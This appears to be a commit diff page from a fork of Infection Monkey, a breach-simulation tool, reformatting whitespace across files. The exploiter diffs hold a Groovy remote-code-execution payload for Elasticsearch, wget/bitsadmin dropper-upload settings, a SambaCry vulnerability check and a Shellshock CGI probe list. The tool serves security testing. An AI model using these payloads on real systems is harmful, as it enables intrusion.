p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Whitespace and imports fixes

This commit is contained in:
Shay Nehmad 2019-10-28 16:14:52 +02:00
parent a9a3c7705e
commit cd3835a42e
28 changed files with 593 additions and 527 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
monkey/common/cloud/aws_instance.py
View File

@ -29,8 +29,8 @@ class AwsInstance(object):
self.instance_id = urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
self.region = self._parse_region(
urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().
decode())
urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode())
except (urllib.error.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))

2
monkey/common/cmd/aws/aws_cmd_runner.py
View File

@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner):
Class for running commands on a remote AWS machine
"""
def __init__(self, is_linux, instance_id, region = None):
def __init__(self, is_linux, instance_id, region=None):
super(AwsCmdRunner, self).__init__(is_linux)
self.instance_id = instance_id
self.region = region

30
monkey/common/data/zero_trust_consts.py
View File

@ -68,7 +68,8 @@ FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
@ -78,7 +79,8 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
},
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
},
@ -89,8 +91,10 @@ TESTS_MAP = {
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
"software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
"security concern. "
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
@ -99,7 +103,8 @@ TESTS_MAP = {
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
@ -109,7 +114,8 @@ TESTS_MAP = {
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
"software.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
},
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
@ -120,7 +126,8 @@ TESTS_MAP = {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
"that indicate attempts to access them. "
},
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA],
@ -130,7 +137,8 @@ TESTS_MAP = {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
"attempts to access them. "
},
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA],
@ -139,7 +147,8 @@ TESTS_MAP = {
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
"restrict them. "
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
@ -148,7 +157,8 @@ TESTS_MAP = {
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,

2
monkey/common/utils/code_utils.py
View File

@ -1,10 +1,12 @@
# abstract, static method decorator
# noinspection PyPep8Naming
class abstractstatic(staticmethod):
__slots__ = ()
def __init__(self, function):
super(abstractstatic, self).__init__(function)
function.__isabstractmethod__ = True
__isabstractmethod__ = True

6
monkey/infection_monkey/exploit/elasticgroovy.py
View File

@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE):
# attack URLs
MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
JAVA_CMD = GENERIC_QUERY \
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
JAVA_CMD = \
GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Elastic search'
@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
exploit_config['dropper'] = True
exploit_config['url_extensions'] = ['_search?pretty']
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP}
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
return exploit_config
def get_open_service_ports(self, port_list, names):

19
monkey/infection_monkey/exploit/sambacry.py
View File

@ -230,13 +230,13 @@ class SambaCryExploiter(HostExploiter):
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
samba_version_parts[1] <= "13"):
samba_version_parts[1] <= "13"):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
samba_version_parts[1] <= "9"):
samba_version_parts[1] <= "9"):
is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
samba_version_parts[1] <= "3"):
samba_version_parts[1] <= "3"):
is_vulnerable = True
else:
# If pattern doesn't match we can't tell what version it is. Better try
@ -448,7 +448,12 @@ class SambaCryExploiter(HostExploiter):
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
else:
return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA,
shareMode=FILE_SHARE_READ,
creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE,
fileAttributes=0)
return SambaCryExploiter.create_smb(
smb_client,
treeId,
pathName,
desiredAccess=FILE_READ_DATA,
shareMode=FILE_SHARE_READ,
creationOptions=FILE_OPEN,
creationDisposition=FILE_NON_DIRECTORY_FILE,
fileAttributes=0)

808
monkey/infection_monkey/exploit/shellshock_resources.py
View File

@ -1,406 +1,408 @@
# resource for shellshock attack
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
CGI_FILES = (r'/',
r'/admin.cgi',
r'/administrator.cgi',
r'/agora.cgi',
r'/aktivate/cgi-bin/catgy.cgi',
r'/analyse.cgi',
r'/apps/web/vs_diag.cgi',
r'/axis-cgi/buffer/command.cgi',
r'/b2-include/b2edit.showposts.php',
r'/bandwidth/index.cgi',
r'/bigconf.cgi',
r'/cartcart.cgi',
r'/cart.cgi',
r'/ccbill/whereami.cgi',
r'/cgi-bin/14all-1.1.cgi',
r'/cgi-bin/14all.cgi',
r'/cgi-bin/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp4.cgi',
r'/cgi-bin/addbanner.cgi',
r'/cgi-bin/add_ftp.cgi',
r'/cgi-bin/adduser.cgi',
r'/cgi-bin/admin/admin.cgi',
r'/cgi-bin/admin.cgi',
r'/cgi-bin/admin/getparam.cgi',
r'/cgi-bin/adminhot.cgi',
r'/cgi-bin/admin.pl',
r'/cgi-bin/admin/setup.cgi',
r'/cgi-bin/adminwww.cgi',
r'/cgi-bin/af.cgi',
r'/cgi-bin/aglimpse.cgi',
r'/cgi-bin/alienform.cgi',
r'/cgi-bin/AnyBoard.cgi',
r'/cgi-bin/architext_query.cgi',
r'/cgi-bin/astrocam.cgi',
r'/cgi-bin/AT-admin.cgi',
r'/cgi-bin/AT-generate.cgi',
r'/cgi-bin/auction/auction.cgi',
r'/cgi-bin/auktion.cgi',
r'/cgi-bin/ax-admin.cgi',
r'/cgi-bin/ax.cgi',
r'/cgi-bin/axs.cgi',
r'/cgi-bin/badmin.cgi',
r'/cgi-bin/banner.cgi',
r'/cgi-bin/bannereditor.cgi',
r'/cgi-bin/bb-ack.sh',
r'/cgi-bin/bb-histlog.sh',
r'/cgi-bin/bb-hist.sh',
r'/cgi-bin/bb-hostsvc.sh',
r'/cgi-bin/bb-replog.sh',
r'/cgi-bin/bb-rep.sh',
r'/cgi-bin/bbs_forum.cgi',
r'/cgi-bin/bigconf.cgi',
r'/cgi-bin/bizdb1-search.cgi',
r'/cgi-bin/blog/mt-check.cgi',
r'/cgi-bin/blog/mt-load.cgi',
r'/cgi-bin/bnbform.cgi',
r'/cgi-bin/book.cgi',
r'/cgi-bin/boozt/admin/index.cgi',
r'/cgi-bin/bsguest.cgi',
r'/cgi-bin/bslist.cgi',
r'/cgi-bin/build.cgi',
r'/cgi-bin/bulk/bulk.cgi',
r'/cgi-bin/cached_feed.cgi',
r'/cgi-bin/cachemgr.cgi',
r'/cgi-bin/calendar/index.cgi',
r'/cgi-bin/cartmanager.cgi',
r'/cgi-bin/cbmc/forums.cgi',
r'/cgi-bin/ccvsblame.cgi',
r'/cgi-bin/c_download.cgi',
r'/cgi-bin/cgforum.cgi',
r'/cgi-bin/.cgi',
r'/cgi-bin/cgi_process',
r'/cgi-bin/classified.cgi',
r'/cgi-bin/classifieds.cgi',
r'/cgi-bin/classifieds/classifieds.cgi',
r'/cgi-bin/classifieds/index.cgi',
r'/cgi-bin/.cobalt/alert/service.cgi',
r'/cgi-bin/.cobalt/message/message.cgi',
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
r'/cgi-bin/commandit.cgi',
r'/cgi-bin/commerce.cgi',
r'/cgi-bin/common/listrec.pl',
r'/cgi-bin/compatible.cgi',
r'/cgi-bin/Count.cgi',
r'/cgi-bin/csChatRBox.cgi',
r'/cgi-bin/csGuestBook.cgi',
r'/cgi-bin/csLiveSupport.cgi',
r'/cgi-bin/CSMailto.cgi',
r'/cgi-bin/CSMailto/CSMailto.cgi',
r'/cgi-bin/csNews.cgi',
r'/cgi-bin/csNewsPro.cgi',
r'/cgi-bin/csPassword.cgi',
r'/cgi-bin/csPassword/csPassword.cgi',
r'/cgi-bin/csSearch.cgi',
r'/cgi-bin/csv_db.cgi',
r'/cgi-bin/cvsblame.cgi',
r'/cgi-bin/cvslog.cgi',
r'/cgi-bin/cvsquery.cgi',
r'/cgi-bin/cvsqueryform.cgi',
r'/cgi-bin/day5datacopier.cgi',
r'/cgi-bin/day5datanotifier.cgi',
r'/cgi-bin/db_manager.cgi',
r'/cgi-bin/dbman/db.cgi',
r'/cgi-bin/dcforum.cgi',
r'/cgi-bin/dcshop.cgi',
r'/cgi-bin/dfire.cgi',
r'/cgi-bin/diagnose.cgi',
r'/cgi-bin/dig.cgi',
r'/cgi-bin/directorypro.cgi',
r'/cgi-bin/download.cgi',
r'/cgi-bin/e87_Ba79yo87.cgi',
r'/cgi-bin/emu/html/emumail.cgi',
r'/cgi-bin/emumail.cgi',
r'/cgi-bin/emumail/emumail.cgi',
r'/cgi-bin/enter.cgi',
r'/cgi-bin/environ.cgi',
r'/cgi-bin/ezadmin.cgi',
r'/cgi-bin/ezboard.cgi',
r'/cgi-bin/ezman.cgi',
r'/cgi-bin/ezshopper2/loadpage.cgi',
r'/cgi-bin/ezshopper3/loadpage.cgi',
r'/cgi-bin/ezshopper/loadpage.cgi',
r'/cgi-bin/ezshopper/search.cgi',
r'/cgi-bin/faqmanager.cgi',
r'/cgi-bin/FileSeek2.cgi',
r'/cgi-bin/FileSeek.cgi',
r'/cgi-bin/finger.cgi',
r'/cgi-bin/flexform.cgi',
r'/cgi-bin/fom.cgi',
r'/cgi-bin/fom/fom.cgi',
r'/cgi-bin/FormHandler.cgi',
r'/cgi-bin/FormMail.cgi',
r'/cgi-bin/gbadmin.cgi',
r'/cgi-bin/gbook/gbook.cgi',
r'/cgi-bin/generate.cgi',
r'/cgi-bin/getdoc.cgi',
r'/cgi-bin/gH.cgi',
r'/cgi-bin/gm-authors.cgi',
r'/cgi-bin/gm.cgi',
r'/cgi-bin/gm-cplog.cgi',
r'/cgi-bin/guestbook.cgi',
r'/cgi-bin/handler',
r'/cgi-bin/handler.cgi',
r'/cgi-bin/handler/netsonar',
r'/cgi-bin/hitview.cgi',
r'/cgi-bin/hsx.cgi',
r'/cgi-bin/html2chtml.cgi',
r'/cgi-bin/html2wml.cgi',
r'/cgi-bin/htsearch.cgi',
r'/cgi-bin/hw.sh', # testing
r'/cgi-bin/icat',
r'/cgi-bin/if/admin/nph-build.cgi',
r'/cgi-bin/ikonboard/help.cgi',
r'/cgi-bin/ImageFolio/admin/admin.cgi',
r'/cgi-bin/imageFolio.cgi',
r'/cgi-bin/index.cgi',
r'/cgi-bin/infosrch.cgi',
r'/cgi-bin/jammail.pl',
r'/cgi-bin/journal.cgi',
r'/cgi-bin/lastlines.cgi',
r'/cgi-bin/loadpage.cgi',
r'/cgi-bin/login.cgi',
r'/cgi-bin/logit.cgi',
r'/cgi-bin/log-reader.cgi',
r'/cgi-bin/lookwho.cgi',
r'/cgi-bin/lwgate.cgi',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/magiccard.cgi',
r'/cgi-bin/mail/emumail.cgi',
r'/cgi-bin/maillist.cgi',
r'/cgi-bin/mailnews.cgi',
r'/cgi-bin/mail/nph-mr.cgi',
r'/cgi-bin/main.cgi',
r'/cgi-bin/main_menu.pl',
r'/cgi-bin/man.sh',
r'/cgi-bin/mini_logger.cgi',
r'/cgi-bin/mmstdod.cgi',
r'/cgi-bin/moin.cgi',
r'/cgi-bin/mojo/mojo.cgi',
r'/cgi-bin/mrtg.cgi',
r'/cgi-bin/mt.cgi',
r'/cgi-bin/mt/mt.cgi',
r'/cgi-bin/mt/mt-check.cgi',
r'/cgi-bin/mt/mt-load.cgi',
r'/cgi-bin/mt-static/mt-check.cgi',
r'/cgi-bin/mt-static/mt-load.cgi',
r'/cgi-bin/musicqueue.cgi',
r'/cgi-bin/myguestbook.cgi',
r'/cgi-bin/.namazu.cgi',
r'/cgi-bin/nbmember.cgi',
r'/cgi-bin/netauth.cgi',
r'/cgi-bin/netpad.cgi',
r'/cgi-bin/newsdesk.cgi',
r'/cgi-bin/nlog-smb.cgi',
r'/cgi-bin/nph-emumail.cgi',
r'/cgi-bin/nph-exploitscanget.cgi',
r'/cgi-bin/nph-publish.cgi',
r'/cgi-bin/nph-test.cgi',
r'/cgi-bin/pagelog.cgi',
r'/cgi-bin/pbcgi.cgi',
r'/cgi-bin/perlshop.cgi',
r'/cgi-bin/pfdispaly.cgi',
r'/cgi-bin/pfdisplay.cgi',
r'/cgi-bin/phf.cgi',
r'/cgi-bin/photo/manage.cgi',
r'/cgi-bin/photo/protected/manage.cgi',
r'/cgi-bin/php-cgi',
r'/cgi-bin/php.cgi',
r'/cgi-bin/php.fcgi',
r'/cgi-bin/ping.sh',
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
r'/cgi-bin/pollssi.cgi',
r'/cgi-bin/postcards.cgi',
r'/cgi-bin/powerup/r.cgi',
r'/cgi-bin/printenv',
r'/cgi-bin/probecontrol.cgi',
r'/cgi-bin/profile.cgi',
r'/cgi-bin/publisher/search.cgi',
r'/cgi-bin/quickstore.cgi',
r'/cgi-bin/quizme.cgi',
r'/cgi-bin/ratlog.cgi',
r'/cgi-bin/r.cgi',
r'/cgi-bin/register.cgi',
r'/cgi-bin/replicator/webpage.cgi/',
r'/cgi-bin/responder.cgi',
r'/cgi-bin/robadmin.cgi',
r'/cgi-bin/robpoll.cgi',
r'/cgi-bin/rtpd.cgi',
r'/cgi-bin/sbcgi/sitebuilder.cgi',
r'/cgi-bin/scoadminreg.cgi',
r'/cgi-bin-sdb/printenv',
r'/cgi-bin/sdbsearch.cgi',
r'/cgi-bin/search',
r'/cgi-bin/search.cgi',
r'/cgi-bin/search/search.cgi',
r'/cgi-bin/sendform.cgi',
r'/cgi-bin/shop.cgi',
r'/cgi-bin/shopper.cgi',
r'/cgi-bin/shopplus.cgi',
r'/cgi-bin/showcheckins.cgi',
r'/cgi-bin/simplestguest.cgi',
r'/cgi-bin/simplestmail.cgi',
r'/cgi-bin/smartsearch.cgi',
r'/cgi-bin/smartsearch/smartsearch.cgi',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/sojourn.cgi',
r'/cgi-bin/spin_client.cgi',
r'/cgi-bin/start.cgi',
r'/cgi-bin/status',
r'/cgi-bin/status_cgi',
r'/cgi-bin/store/agora.cgi',
r'/cgi-bin/store.cgi',
r'/cgi-bin/store/index.cgi',
r'/cgi-bin/survey.cgi',
r'/cgi-bin/sync.cgi',
r'/cgi-bin/talkback.cgi',
r'/cgi-bin/technote/main.cgi',
r'/cgi-bin/test2.pl',
r'/cgi-bin/test-cgi',
r'/cgi-bin/test.cgi',
r'/cgi-bin/testing_whatever',
r'/cgi-bin/test/test.cgi',
r'/cgi-bin/tidfinder.cgi',
r'/cgi-bin/tigvote.cgi',
r'/cgi-bin/title.cgi',
r'/cgi-bin/top.cgi',
r'/cgi-bin/traffic.cgi',
r'/cgi-bin/troops.cgi',
r'/cgi-bin/ttawebtop.cgi/',
r'/cgi-bin/ultraboard.cgi',
r'/cgi-bin/upload.cgi',
r'/cgi-bin/urlcount.cgi',
r'/cgi-bin/viewcvs.cgi',
r'/cgi-bin/view_help.cgi',
r'/cgi-bin/viralator.cgi',
r'/cgi-bin/virgil.cgi',
r'/cgi-bin/vote.cgi',
r'/cgi-bin/vpasswd.cgi',
r'/cgi-bin/way-board.cgi',
r'/cgi-bin/way-board/way-board.cgi',
r'/cgi-bin/webbbs.cgi',
r'/cgi-bin/webcart/webcart.cgi',
r'/cgi-bin/webdist.cgi',
r'/cgi-bin/webif.cgi',
r'/cgi-bin/webmail/html/emumail.cgi',
r'/cgi-bin/webmap.cgi',
r'/cgi-bin/webspirs.cgi',
r'/cgi-bin/Web_Store/web_store.cgi',
r'/cgi-bin/whois.cgi',
r'/cgi-bin/whois_raw.cgi',
r'/cgi-bin/whois/whois.cgi',
r'/cgi-bin/wrap',
r'/cgi-bin/wrap.cgi',
r'/cgi-bin/wwwboard.cgi.cgi',
r'/cgi-bin/YaBB/YaBB.cgi',
r'/cgi-bin/zml.cgi',
r'/cgi-mod/index.cgi',
r'/cgis/wwwboard/wwwboard.cgi',
r'/cgi-sys/addalink.cgi',
r'/cgi-sys/defaultwebpage.cgi',
r'/cgi-sys/domainredirect.cgi',
r'/cgi-sys/entropybanner.cgi',
r'/cgi-sys/entropysearch.cgi',
r'/cgi-sys/FormMail-clone.cgi',
r'/cgi-sys/helpdesk.cgi',
r'/cgi-sys/mchat.cgi',
r'/cgi-sys/randhtml.cgi',
r'/cgi-sys/realhelpdesk.cgi',
r'/cgi-sys/realsignup.cgi',
r'/cgi-sys/signup.cgi',
r'/connector.cgi',
r'/cp/rac/nsManager.cgi',
r'/create_release.sh',
r'/CSNews.cgi',
r'/csPassword.cgi',
r'/dcadmin.cgi',
r'/dcboard.cgi',
r'/dcforum.cgi',
r'/dcforum/dcforum.cgi',
r'/debuff.cgi',
r'/debug.cgi',
r'/details.cgi',
r'/edittag/edittag.cgi',
r'/emumail.cgi',
r'/enter_buff.cgi',
r'/enter_bug.cgi',
r'/ez2000/ezadmin.cgi',
r'/ez2000/ezboard.cgi',
r'/ez2000/ezman.cgi',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo2',
r'/fcgi-bin/echo2',
r'/Gozila.cgi',
r'/hitmatic/analyse.cgi',
r'/hp_docs/cgi-bin/index.cgi',
r'/html/cgi-bin/cgicso',
r'/html/cgi-bin/cgicso',
r'/index.cgi',
r'/info.cgi',
r'/infosrch.cgi',
r'/login.cgi',
r'/mailview.cgi',
r'/main.cgi',
r'/megabook/admin.cgi',
r'/ministats/admin.cgi',
r'/mods/apage/apage.cgi',
r'/_mt/mt.cgi',
r'/musicqueue.cgi',
r'/ncbook.cgi',
r'/newpro.cgi',
r'/newsletter.sh',
r'/oem_webstage/cgi-bin/oemapp_cgi',
r'/page.cgi',
r'/parse_xml.cgi',
r'/photodata/manage.cgi',
r'/photo/manage.cgi',
r'/print.cgi',
r'/process_buff.cgi',
r'/process_bug.cgi',
r'/pub/english.cgi',
r'/quikmail/nph-emumail.cgi',
r'/quikstore.cgi',
r'/reviews/newpro.cgi',
r'/ROADS/cgi-bin/search.pl',
r'/sample01.cgi',
r'/sample02.cgi',
r'/sample03.cgi',
r'/sample04.cgi',
r'/sampleposteddata.cgi',
r'/scancfg.cgi',
r'/scancfg.cgi',
r'/servers/link.cgi',
r'/setpasswd.cgi',
r'/SetSecurity.shm',
r'/shop/member_html.cgi',
r'/shop/normal_html.cgi',
r'/site_searcher.cgi',
r'/siteUserMod.cgi',
r'/submit.cgi',
r'/technote/print.cgi',
r'/template.cgi',
r'/test.cgi',
r'/ucsm/isSamInstalled.cgi',
r'/upload.cgi',
r'/userreg.cgi',
r'/users/scripts/submit.cgi',
r'/vood/cgi-bin/vood_view.cgi',
r'/Web_Store/web_store.cgi',
r'/webtools/bonsai/ccvsblame.cgi',
r'/webtools/bonsai/cvsblame.cgi',
r'/webtools/bonsai/cvslog.cgi',
r'/webtools/bonsai/cvsquery.cgi',
r'/webtools/bonsai/cvsqueryform.cgi',
r'/webtools/bonsai/showcheckins.cgi',
r'/wwwadmin.cgi',
r'/wwwboard.cgi',
r'/wwwboard/wwwboard.cgi')
CGI_FILES = (
r'/',
r'/admin.cgi',
r'/administrator.cgi',
r'/agora.cgi',
r'/aktivate/cgi-bin/catgy.cgi',
r'/analyse.cgi',
r'/apps/web/vs_diag.cgi',
r'/axis-cgi/buffer/command.cgi',
r'/b2-include/b2edit.showposts.php',
r'/bandwidth/index.cgi',
r'/bigconf.cgi',
r'/cartcart.cgi',
r'/cart.cgi',
r'/ccbill/whereami.cgi',
r'/cgi-bin/14all-1.1.cgi',
r'/cgi-bin/14all.cgi',
r'/cgi-bin/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp4.cgi',
r'/cgi-bin/addbanner.cgi',
r'/cgi-bin/add_ftp.cgi',
r'/cgi-bin/adduser.cgi',
r'/cgi-bin/admin/admin.cgi',
r'/cgi-bin/admin.cgi',
r'/cgi-bin/admin/getparam.cgi',
r'/cgi-bin/adminhot.cgi',
r'/cgi-bin/admin.pl',
r'/cgi-bin/admin/setup.cgi',
r'/cgi-bin/adminwww.cgi',
r'/cgi-bin/af.cgi',
r'/cgi-bin/aglimpse.cgi',
r'/cgi-bin/alienform.cgi',
r'/cgi-bin/AnyBoard.cgi',
r'/cgi-bin/architext_query.cgi',
r'/cgi-bin/astrocam.cgi',
r'/cgi-bin/AT-admin.cgi',
r'/cgi-bin/AT-generate.cgi',
r'/cgi-bin/auction/auction.cgi',
r'/cgi-bin/auktion.cgi',
r'/cgi-bin/ax-admin.cgi',
r'/cgi-bin/ax.cgi',
r'/cgi-bin/axs.cgi',
r'/cgi-bin/badmin.cgi',
r'/cgi-bin/banner.cgi',
r'/cgi-bin/bannereditor.cgi',
r'/cgi-bin/bb-ack.sh',
r'/cgi-bin/bb-histlog.sh',
r'/cgi-bin/bb-hist.sh',
r'/cgi-bin/bb-hostsvc.sh',
r'/cgi-bin/bb-replog.sh',
r'/cgi-bin/bb-rep.sh',
r'/cgi-bin/bbs_forum.cgi',
r'/cgi-bin/bigconf.cgi',
r'/cgi-bin/bizdb1-search.cgi',
r'/cgi-bin/blog/mt-check.cgi',
r'/cgi-bin/blog/mt-load.cgi',
r'/cgi-bin/bnbform.cgi',
r'/cgi-bin/book.cgi',
r'/cgi-bin/boozt/admin/index.cgi',
r'/cgi-bin/bsguest.cgi',
r'/cgi-bin/bslist.cgi',
r'/cgi-bin/build.cgi',
r'/cgi-bin/bulk/bulk.cgi',
r'/cgi-bin/cached_feed.cgi',
r'/cgi-bin/cachemgr.cgi',
r'/cgi-bin/calendar/index.cgi',
r'/cgi-bin/cartmanager.cgi',
r'/cgi-bin/cbmc/forums.cgi',
r'/cgi-bin/ccvsblame.cgi',
r'/cgi-bin/c_download.cgi',
r'/cgi-bin/cgforum.cgi',
r'/cgi-bin/.cgi',
r'/cgi-bin/cgi_process',
r'/cgi-bin/classified.cgi',
r'/cgi-bin/classifieds.cgi',
r'/cgi-bin/classifieds/classifieds.cgi',
r'/cgi-bin/classifieds/index.cgi',
r'/cgi-bin/.cobalt/alert/service.cgi',
r'/cgi-bin/.cobalt/message/message.cgi',
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
r'/cgi-bin/commandit.cgi',
r'/cgi-bin/commerce.cgi',
r'/cgi-bin/common/listrec.pl',
r'/cgi-bin/compatible.cgi',
r'/cgi-bin/Count.cgi',
r'/cgi-bin/csChatRBox.cgi',
r'/cgi-bin/csGuestBook.cgi',
r'/cgi-bin/csLiveSupport.cgi',
r'/cgi-bin/CSMailto.cgi',
r'/cgi-bin/CSMailto/CSMailto.cgi',
r'/cgi-bin/csNews.cgi',
r'/cgi-bin/csNewsPro.cgi',
r'/cgi-bin/csPassword.cgi',
r'/cgi-bin/csPassword/csPassword.cgi',
r'/cgi-bin/csSearch.cgi',
r'/cgi-bin/csv_db.cgi',
r'/cgi-bin/cvsblame.cgi',
r'/cgi-bin/cvslog.cgi',
r'/cgi-bin/cvsquery.cgi',
r'/cgi-bin/cvsqueryform.cgi',
r'/cgi-bin/day5datacopier.cgi',
r'/cgi-bin/day5datanotifier.cgi',
r'/cgi-bin/db_manager.cgi',
r'/cgi-bin/dbman/db.cgi',
r'/cgi-bin/dcforum.cgi',
r'/cgi-bin/dcshop.cgi',
r'/cgi-bin/dfire.cgi',
r'/cgi-bin/diagnose.cgi',
r'/cgi-bin/dig.cgi',
r'/cgi-bin/directorypro.cgi',
r'/cgi-bin/download.cgi',
r'/cgi-bin/e87_Ba79yo87.cgi',
r'/cgi-bin/emu/html/emumail.cgi',
r'/cgi-bin/emumail.cgi',
r'/cgi-bin/emumail/emumail.cgi',
r'/cgi-bin/enter.cgi',
r'/cgi-bin/environ.cgi',
